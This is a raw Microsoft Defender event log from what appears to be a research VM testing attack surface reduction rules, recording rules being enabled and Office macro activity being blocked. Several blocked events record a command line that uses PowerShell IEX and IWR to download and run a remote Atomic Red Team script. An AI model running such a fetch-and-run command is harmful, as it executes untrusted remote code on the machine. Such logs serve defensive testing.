1121 | 0 | 3 | 0 | 0 | 0x8000000000000000 | 2975 | Microsoft-Windows-Windows Defender/Operational | researchvmhaa | Microsoft Defender Antivirus | 4.18.23100.2009 | 3B576869-A4EC-4529-8536-B80A7769E899 | 2023-11-20T16:29:48.984Z | researchvmhaa\research | C:\Users\research\AppData\Local\Temp\script.vbs | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | 1.401.912.0 | 1.1.23100.2009 | ENT\ConsR | "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" | 0x00000000

1121 | 0 | 3 | 0 | 0 | 0x8000000000000000 | 2972 | Microsoft-Windows-Windows Defender/Operational | researchvmhaa | Microsoft Defender Antivirus | 4.18.23100.2009 | 3B576869-A4EC-4529-8536-B80A7769E899 | 2023-11-20T16:27:30.572Z | researchvmhaa\research | C:\Users\research\AppData\Local\Temp\script.vbs | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | 1.401.912.0 | 1.1.23100.2009 | ENT\ConsR | "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" | 0x00000000

1121 | 0 | 3 | 0 | 0 | 0x8000000000000000 | 2971 | Microsoft-Windows-Windows Defender/Operational | researchvmhaa | Microsoft Defender Antivirus | 4.18.23100.2009 | D4F940AB-401B-4EFC-AADC-AD5F3C50688A | 2023-11-20T16:27:18.000Z | researchvmhaa\research | C:\Windows\System32\rundll32.exe | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | 1.401.912.0 | 1.1.23100.2009 | ENT\ConsR | C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding | "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls" | C:\Users\research\Desktop\macs\mac5.xls | 0x00000000

1121 | 0 | 3 | 0 | 0 | 0x8000000000000000 | 2964 | Microsoft-Windows-Windows Defender/Operational | researchvmhaa | Microsoft Defender Antivirus | 4.18.23100.2009 | D4F940AB-401B-4EFC-AADC-AD5F3C50688A | 2023-11-20T15:42:46.183Z | researchvmhaa\research | C:\Windows\System32\cmd.exe | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | 1.401.908.0 | 1.1.23100.2009 | ENT\ConsR | cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') | "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac7.xls" | C:\Users\research\Desktop\macs\mac7.xls | 0x00000000

1121 | 0 | 3 | 0 | 0 | 0x8000000000000000 | 2963 | Microsoft-Windows-Windows Defender/Operational | researchvmhaa | Microsoft Defender Antivirus | 4.18.23100.2009 | D4F940AB-401B-4EFC-AADC-AD5F3C50688A | 2023-11-20T15:42:37.633Z | researchvmhaa\research | C:\Windows\System32\cmd.exe | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | 1.401.908.0 | 1.1.23100.2009 | ENT\ConsR | cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') | "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac8.xls" | C:\Users\research\Desktop\macs\mac8.xls | 0x00000000

1121 | 0 | 3 | 0 | 0 | 0x8000000000000000 | 2961 | Microsoft-Windows-Windows Defender/Operational | researchvmhaa | Microsoft Defender Antivirus | 4.18.23100.2009 | D4F940AB-401B-4EFC-AADC-AD5F3C50688A | 2023-11-20T15:42:14.127Z | researchvmhaa\research | C:\Windows\System32\cmd.exe | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | 1.401.908.0 | 1.1.23100.2009 | ENT\ConsR | cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') | "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac6.xls" | C:\Users\research\Desktop\macs\mac6.xls | 0x00000000

5007 | 0 | 4 | 0 | 0 | 0x8000000000000000 | 2911 | Microsoft-Windows-Windows Defender/Operational | researchvmhaa | Microsoft Defender Antivirus | 4.18.23100.2009 | HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1

5007 | 0 | 4 | 0 | 0 | 0x8000000000000000 | 2908 | Microsoft-Windows-Windows Defender/Operational | researchvmhaa | Microsoft Defender Antivirus | 4.18.23100.2009 | HKLM\SOFTWARE\Microsoft\Windows Defender\SmartLockerMode = 0x1 | HKLM\SOFTWARE\Microsoft\Windows Defender\SmartLockerMode = 0x0

5007 | 0 | 4 | 0 | 0 | 0x8000000000000000 | 2907 | Microsoft-Windows-Windows Defender/Operational | researchvmhaa | Microsoft Defender Antivirus | 4.18.23100.2009 | HKLM\SOFTWARE\Microsoft\Windows Defender\VerifiedAndReputableTrustModeEnabled = 0x1 | HKLM\SOFTWARE\Microsoft\Windows Defender\VerifiedAndReputableTrustModeEnabled = 0x0

11/20/2023 03:31:50 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2779 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\SacLearningModeSwitch = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\SacLearningModeSwitch = 0x1

11/20/2023 03:31:45 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2772 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1

11/19/2023 03:39:33 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2740 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 New value:

11/19/2023 01:31:53 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2597 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1

11/18/2023 12:31:48 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2496 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 New value:

11/17/2023 05:29:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2398 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:29:44.894Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac8.xls" Involved File: C:\Users\research\Desktop\macs\mac8.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2397 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2396 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2395 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2394 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2393 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2392 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2391 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2390 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2389 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2388 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2387 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2386 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2385 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2384 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2383 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1

11/17/2023 05:29:17 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2382 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1

11/17/2023 05:27:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2379 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:27:28.753Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac7.xls" Involved File: C:\Users\research\Desktop\macs\mac7.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 05:27:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2378 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:27:18.518Z User: researchvmhaa\research Path: C:\Windows\System32\rundll32.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls" Involved File: C:\Users\research\Desktop\macs\mac5.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 05:27:11 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2377 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:27:11.636Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac1.xls" Involved File: C:\Users\research\Desktop\macs\mac1.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 05:26:53 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2376 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:26:53.781Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macrotestinglive.xls" Involved File: C:\Users\research\Desktop\macrotestinglive.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 05:23:37 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1129 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2360 Keywords=None TaskCategory=None OpCode=Info Message=A user has allowed a blocked Microsoft Defender Exploit Guard operation. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C User: NT AUTHORITY\SYSTEM Path: C:\Windows\System32\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Involved File:

11/17/2023 05:23:35 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1129 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2359 Keywords=None TaskCategory=None OpCode=Info Message=A user has allowed a blocked Microsoft Defender Exploit Guard operation. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C User: NT AUTHORITY\SYSTEM Path: C:\Windows\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Involved File:

11/17/2023 05:23:27 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2358 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C Detection time: 2023-11-17T17:23:27.874Z User: NT AUTHORITY\SYSTEM Path: C:\Windows\System32\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Target Commandline: "cmd" Parent Commandline: C:\Windows\PSEXESVC.exe Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 05:23:27 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2357 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C Detection time: 2023-11-17T17:23:27.753Z User: NT AUTHORITY\SYSTEM Path: C:\Windows\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Target Commandline: "cmd" Parent Commandline: C:\Windows\PSEXESVC.exe Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 05:18:38 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2341 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 3B576869-A4EC-4529-8536-B80A7769E899 Detection time: 2023-11-17T17:18:38.414Z User: researchvmhaa\research Path: C:\Users\research\AppData\Local\Temp\script.vbs Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

